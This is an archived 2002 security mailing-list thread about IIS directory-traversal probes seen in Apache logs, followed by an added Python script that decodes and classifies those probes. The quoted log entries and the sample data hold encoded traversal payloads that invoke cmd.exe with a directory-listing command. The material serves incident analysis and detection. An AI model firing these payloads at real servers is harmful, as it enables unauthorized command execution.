[unisog] increasing cmd.exe port 80/tcp probes

Jeff Anderson-Lee jonah at eecs.berkeley.edu
Mon Jun 3 16:38:07 GMT 2002


These probing patterns are IIS Directory Traversal probes, but
they are not indicative of any CodeRed or Nimda variant that I am
aware of.  The CERT Advisories list explicit probe patterns for
these which I am familiar with:

http://www.cert.org/advisories/CA-2001-19.html (CodeRed)
http://www.cert.org/incident_notes/IN-2001-09.html (Code Red II)
http://www.cert.org/advisories/CA-2001-26.html (Nimda)

This appears to be something new, attacking the same security hole.
If you can point to information to the contrary, I'd greatly appreciate
it.

Jeff Anderson-Lee
Systems Manager, Digital Library Project
ERL, University of California at Berkeley

> Hello Jeff,
>
> Others have most probably already responded... this pattern is indicative
> of CodeRed.
>
> At 10:04 AM 6/2/2002 -0700, you wrote:
>
>> Starting on Jan 5, 2002 I've been noticing some particular probes
>> appearing regularly in my apache logs.  There are two patterns of
>> note.  The first is a single probe:
>>
>>    "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir"
>>
>> and the second is a pair of probes:
>>
>>    "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1"
>>    "GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1"
>>
>> At first, seeing a new host with one of these probe patterns was a
>> weekly event, then later about once a day.  However in the past
>> thirty-six hours I've started to see a sudden rise in the incidence of
>> new hosts scanning with the first pattern:
>>
>> dlp:X.uniweb.net.co [200.24.X.X] - - [31/May/2002:22:39:46 -0700] 
>> "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 
>> ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:136.145.X.X [136.145.X.X] - - [31/May/2002:22:43:07 -0700] "GET 
>> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- 
>> -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.tricornet.com [207.190.X.X] - - [31/May/2002:23:12:43 -0700] 
>> "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 
>> ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.stny.rr.com [24.169.X.X] - - [31/May/2002:23:31:09 -0700] "GET 
>> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- 
>> -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.mfr.com [216.223.X.X] - - [01/Jun/2002:05:50:48 -0700] "GET 
>> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- 
>> -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.losangeles-ics.com [63.68.X.X] - - [01/Jun/2002:05:55:26 -0700] 
>> "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 
>> ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.aplikacie.sk [212.55.X.X] - - [01/Jun/2002:07:51:02 -0700] "GET 
>> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- 
>> -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.globetrotter.net [142.169.X.X] - - [01/Jun/2002:11:51:16 -0700] 
>> "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 
>> ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.encompserv.com [63.160.X.X] - - [01/Jun/2002:14:11:48 -0700] 
>> "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 
>> ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.k12.al.us [216.109.X.X] - - [01/Jun/2002:21:08:52 -0700] "GET 
>> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- 
>> -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.atl.client2.attbi.com [24.98.X.X] - - [01/Jun/2002:21:27:15 
>> -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 
>> 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:208.255.X.X [208.255.X.X] - - [01/Jun/2002:21:35:05 -0700] "GET 
>> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- 
>> -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:128.173.X.X [128.173.X.X] - - [02/Jun/2002:04:53:12 -0700] "GET 
>> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- 
>> -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>>
>>
>> Has anyone else noticed these patterns in their logs?
>> Does anyone know if a virus/worm has been identified with this
>> probing pattern?
>
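The three request paths quoted in the thread are different encodings of the same directory-traversal attempt: `%255c` percent-decodes twice to a backslash, `%252e` twice to a dot, and `%c0%af` is an overlong two-byte UTF-8 form of `/` that a strict decoder rejects. A defender who decodes the path repeatedly and canonicalises separators sees all three resolve to one target, which is the basis for a single log signature rather than one rule per encoding. The script below is an added example, not code from the original post or any participant; it runs over constructed sample lines in Apache common log format (addresses in the 203.0.113.0/24 documentation range, timestamps and sizes invented), decodes each request path, flags probes that traverse to `cmd.exe`, labels the encoding trick used, and counts distinct source hosts per pattern, the figure the original poster was tracking.

```python
import posixpath
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Constructed sample lines in Apache common log format. Addresses, timestamps
# and sizes are placeholders, not the entries from the original post.
SAMPLE_LOG = r"""
203.0.113.10 - - [31/May/2002:22:39:46 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3234
203.0.113.11 - - [01/Jun/2002:05:50:48 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 404 3234
203.0.113.11 - - [01/Jun/2002:05:50:49 -0700] "GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 404 3234
203.0.113.12 - - [01/Jun/2002:07:51:02 -0700] "GET /index.html HTTP/1.1" 200 1043
203.0.113.13 - - [01/Jun/2002:07:52:10 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3234
"""

# Common log format: ip ident user [timestamp] "method target proto" status size
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: (?P<proto>\S+))?" (?P<status>\d{3}) (?P<size>\S+)'
)

# Two-byte overlong UTF-8 encodings of '/' (0x2f) and '\' (0x5c). Strict UTF-8
# decoders reject these, so they are mapped explicitly before decoding.
OVERLONG = {b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\"}


def decode_once(s: str) -> str:
    """One round of percent-decoding, with overlong slash forms mapped to ASCII."""
    raw = unquote_to_bytes(s)
    for seq, rep in OVERLONG.items():
        raw = raw.replace(seq, rep)
    return raw.decode("latin-1")


def normalize_target(target: str, max_rounds: int = 3):
    """Decode the request path until no percent-escapes remain (bounded), then
    canonicalise separators. Returns (canonical_path, resolved_path, rounds)."""
    path = target.split("?", 1)[0]          # query string is not part of the path
    rounds = 0
    while rounds < max_rounds and "%" in path:
        path = decode_once(path)
        rounds += 1
    canonical = re.sub(r"/+", "/", path.replace("\\", "/"))
    return canonical, posixpath.normpath(canonical), rounds


def classify(raw_target: str, canonical: str, rounds: int):
    """Label a request as a traversal probe against cmd.exe, or None if benign."""
    if "/../" not in canonical or not canonical.lower().endswith("/cmd.exe"):
        return None
    lower = raw_target.lower()
    if "%c0%af" in lower or "%c1%9c" in lower:
        return "overlong-utf8"
    if rounds >= 2:
        return "double-encoded"
    return "plain"


def scan(log_text: str):
    """Parse each log line and return a finding per matching probe."""
    findings = []
    for line in log_text.strip().splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue                         # not common log format; skip
        canonical, resolved, rounds = normalize_target(m["target"])
        label = classify(m["target"], canonical, rounds)
        if label is None:
            continue
        findings.append({
            "ip": m["ip"],
            "ts": m["ts"],
            "pattern": label,
            "decode_rounds": rounds,
            "resolved": resolved,            # where the path lands after traversal
            "status": int(m["status"]),
        })
    return findings


def hosts_per_pattern(findings):
    """Distinct source addresses per probe pattern (sorted, for stable output)."""
    hosts = defaultdict(set)
    for f in findings:
        hosts[f["pattern"]].add(f["ip"])
    return {k: sorted(v) for k, v in hosts.items()}


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for f in results:
        print(f"{f['ip']:15} {f['pattern']:15} rounds={f['decode_rounds']} "
              f"-> {f['resolved']} ({f['status']})")
    print(hosts_per_pattern(results))
```

Every flagged line resolves to `/winnt/system32/cmd.exe` regardless of encoding, so the canonical path, not the raw bytes, is what a detection rule should match. The decode loop is bounded because a path can be encoded more times than anyone would legitimately need; a request that still contains `%` after the bound is itself worth a closer look. On a real server the 404 responses show the probes missed; the same script pointed at an IIS log would show a 200 on a host that answered them.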


